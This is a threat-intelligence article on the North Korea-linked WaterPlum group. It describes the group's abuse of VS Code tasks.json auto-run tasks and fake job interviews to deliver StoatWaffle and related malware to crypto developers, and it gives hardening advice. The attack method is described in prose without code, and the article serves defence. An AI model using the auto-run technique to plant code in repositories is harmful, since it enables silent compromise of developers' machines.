North Korean state-aligned threat actors tracked as WaterPlum, and linked to the Contagious Interview campaign, are exploiting Visual Studio Code (VS Code) projects as a novel malware delivery channel. By weaponizing the StoatWaffle malware family inside “test” repositories and fake technical interviews, the group is targeting experienced developers in the cryptocurrency and Web3 ecosystem, abusing trust in both integrated development environments (IDEs) and hiring processes.
Malicious VS Code tasks.json: abusing runOn “folderOpen”
According to research by NTT Security, WaterPlum has been leveraging the VS Code tasks.json configuration file since late 2025 to achieve near-silent code execution when a project is opened. The key parameter runOn: "folderOpen" allows tasks to run automatically whenever a workspace folder is opened, without any explicit action from the developer.
In the observed attacks, a malicious task fetches JavaScript from a remote Vercel web application or, in newer variants, from GitHub Gist, and executes it as Node.js code. Because Node.js is inherently cross‑platform, the same malicious logic reliably impacts Windows, macOS, and Linux systems, making this vector particularly attractive to the attackers.
StoatWaffle: modular Node.js malware for multi-stage compromise
The initial StoatWaffle component first checks whether Node.js is installed on the victim system. If not present, it downloads and installs the official Node.js distribution, effectively creating its own execution environment and removing a common dependency barrier for malware on developer workstations.
Once the runtime is available, a downloader module periodically contacts a command-and-control (C2) server to retrieve additional payloads. Researchers describe StoatWaffle as a modular Node.js malware framework that currently includes at least two major module types: a stealer for harvesting credentials and sensitive data, and a remote access trojan (RAT) for full remote control of the compromised host.
This modular design allows WaterPlum operators to add or swap functionality—such as new credential-theft plugins or lateral movement tools—without redeploying the entire campaign. Similar modular tactics have been observed in other advanced persistent threat (APT) operations and enable agile adaptation to defenders’ countermeasures.
Contagious Interview: fake hiring to breach crypto and Web3 companies
Microsoft’s analysis of the Contagious Interview campaign shows that initial access is typically obtained through highly convincing fake recruitment processes. Victims are approached on LinkedIn or other professional channels and invited to participate in a “technical screening,” during which they are instructed to clone repositories or run scripts from platforms such as GitHub, GitLab, or Bitbucket.
Unlike generic phishing, WaterPlum focuses on founders, CTOs, and senior engineers at crypto and Web3 firms, individuals who often control production infrastructure, signing keys, and company wallets. Public reporting includes at least one failed attempt to compromise the founder of AllSecure.io via such a fabricated interview, underscoring the group’s interest in high-value, high-privilege targets.
WaterPlum’s malware ecosystem: OtterCookie, InvisibleFerret, FlexibleFerret
StoatWaffle is only one element in a broader WaterPlum toolset observed in Contagious Interview intrusion chains. Other families include:
OtterCookie – a backdoor with extensive data-theft capabilities that often appears as an early-stage payload before additional components are deployed.
InvisibleFerret – a Python-based backdoor that was historically delivered via a component known as BeaverTail, but is now more frequently installed as a follow-on stage after OtterCookie.
FlexibleFerret (also tracked as WeaselStore) – a modular backdoor available in Go (GolangGhost) and Python (PylangGhost) variants. Security analysts report that FlexibleFerret increasingly acts as the final payload in VS Code–based attacks originating from GitHub repositories, providing long-term persistence and flexible command execution.
Hardening Visual Studio Code and development workflows
In response to abuse of the Tasks feature, Microsoft introduced a new setting, task.allowAutomaticTasks, in VS Code 1.109. By default, this setting disables automatic task execution from tasks.json when a workspace is opened. Crucially, this option can no longer be overridden at the workspace level, meaning a malicious repository’s .vscode/settings.json cannot silently re-enable auto-run behavior.
VS Code versions 1.109 and 1.110 also add an additional warning whenever auto-run tasks are detected in a newly opened workspace, complementing the existing Workspace Trust model. Security teams should ensure these protections are enabled, and developers should be trained to inspect .vscode directories—especially in third‑party repositories or “test projects” provided for interviews.
Beyond IDE settings, organizations in the crypto and Web3 space should establish formal policies for handling coding challenges and interview assignments, treat all external repositories as untrusted code, and monitor for unusual interpreter activity (for example, unexpected Node.js, Python, or Go processes on developer endpoints).
DPRK IT workers, sanctions evasion, and strategic objectives
WaterPlum’s activity aligns with the broader North Korean cyber program, which blends espionage, theft, and sanctions evasion. The U.S. Department of Justice has reported convictions of U.S. citizens who assisted North Korean IT workers in circumventing sanctions by fronting for them in remote jobs; in one case, the court ordered imprisonment and the forfeiture of more than $190,000 in illicit earnings.
Joint research by Flare and IBM X-Force describes North Korean IT workers as an elite cadre trained at top universities and carefully selected for overseas cyber operations. Their missions include revenue generation, cyber‑espionage, ransomware, and support for other DPRK threat groups. Public blockchain-analytics reporting, such as from Chainalysis, has linked DPRK-aligned actors to over a billion dollars in cryptocurrency theft across recent years, making targeted attacks on crypto developers a logical extension of this strategy.
WaterPlum and Contagious Interview highlight a critical shift: IDEs, code repositories, and recruitment workflows can no longer be treated as inherently safe. Crypto and Web3 organizations should routinely audit VS Code configurations, disable automatic tasks, vet any external test assignments, and deploy endpoint monitoring tuned to developer tools. Combined with regular training on phishing and fake interviews, these measures make it significantly harder for state-backed groups such as WaterPlum to weaponize trusted development environments against the very engineers who rely on them.
